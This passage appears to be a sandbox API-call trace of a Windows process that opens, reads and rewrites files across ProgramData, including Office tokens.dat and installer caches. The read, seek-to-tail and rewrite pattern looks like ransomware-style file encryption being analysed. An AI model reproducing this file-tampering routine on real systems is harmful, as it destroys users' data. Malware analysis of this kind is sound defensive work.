lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.442] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0178.442] WriteFile (in: hFile=0x1d8, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0178.442] CloseHandle (hObject=0x1d8) returned 1 [0178.443] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.444] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x359f690*="superbar.png") returned 0x64 [0178.444] GetLastError () returned 0x5 [0178.444] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0178.444] LocalFree (hMem=0x69e2b0) returned 0x0 [0178.444] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0178.444] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0178.445] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0178.445] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0178.445] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0178.446] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.447] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.447] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x469bd5 [0178.447] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.447] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.447] ReleaseMutex (hMutex=0x168) returned 1 [0178.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tokens.dat", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tokens.dat", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tokens.dat", lpUsedDefaultChar=0x0) returned 10 [0178.447] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.452] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.455] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.455] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x467bd5 [0178.457] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.459] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x467bd5 [0178.460] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0178.461] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0178.461] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0178.461] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0178.462] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0178.462] CloseHandle (hObject=0x1d8) returned 1 [0178.462] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.463] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.463] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x704 [0178.463] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.463] ReleaseMutex (hMutex=0x168) returned 1 [0178.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0178.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x1f8fc3c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATHEDITOR.14.1033.hxn", lpUsedDefaultChar=0x0) returned 29 [0178.463] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x704, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x359f2bc*=0x704, lpOverlapped=0x0) returned 1 [0178.464] CloseHandle (hObject=0x1d8) returned 1 [0178.464] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.464] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.464] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6da [0178.464] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.465] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.465] ReleaseMutex (hMutex=0x168) returned 1 [0178.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0178.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.ONENOTE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0178.465] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x359f2bc*=0x6da, lpOverlapped=0x0) returned 1 [0178.465] CloseHandle (hObject=0x1d8) returned 1 [0178.465] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x710 [0178.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.466] ReleaseMutex (hMutex=0x168) returned 1 [0178.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0178.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x1f8fc3c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.SHAPESHEET.14.1033.hxn", lpUsedDefaultChar=0x0) returned 31 [0178.466] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f968, nNumberOfBytesToRead=0x710, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x710, lpOverlapped=0x0) returned 1 [0178.466] CloseHandle (hObject=0x1d8) returned 1 [0178.467] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.467] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.467] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xf76c1 [0178.467] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.467] ReleaseMutex (hMutex=0x168) returned 1 [0178.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0178.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0178.468] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.468] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.468] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf66c1 [0178.468] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.468] CloseHandle (hObject=0x1d8) returned 1 [0178.468] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.469] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.469] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x822 [0178.469] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.469] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.469] ReleaseMutex (hMutex=0x168) returned 1 [0178.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0178.469] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f968, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x822, lpOverlapped=0x0) returned 1 [0178.470] CloseHandle (hObject=0x1d8) returned 1 [0178.470] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.470] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.470] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x554aa8 [0178.471] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.471] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.471] ReleaseMutex (hMutex=0x168) returned 1 [0178.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0178.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7360c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0178.471] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.471] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.472] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.472] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x552aa8 [0178.472] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.472] CloseHandle (hObject=0x1d8) returned 1 [0178.472] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.472] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.472] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x816 [0178.473] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.473] ReleaseMutex (hMutex=0x168) returned 1 [0178.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0178.473] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f968, nNumberOfBytesToRead=0x816, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x816, lpOverlapped=0x0) returned 1 [0178.473] CloseHandle (hObject=0x1d8) returned 1 [0178.473] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.474] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.474] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x822 [0178.474] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.474] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.474] ReleaseMutex (hMutex=0x168) returned 1 [0178.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0178.474] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f968, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x822, lpOverlapped=0x0) returned 1 [0178.474] CloseHandle (hObject=0x1d8) returned 1 [0178.475] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.475] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.475] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7000 [0178.476] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.476] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.476] ReleaseMutex (hMutex=0x168) returned 1 [0178.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Work~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, 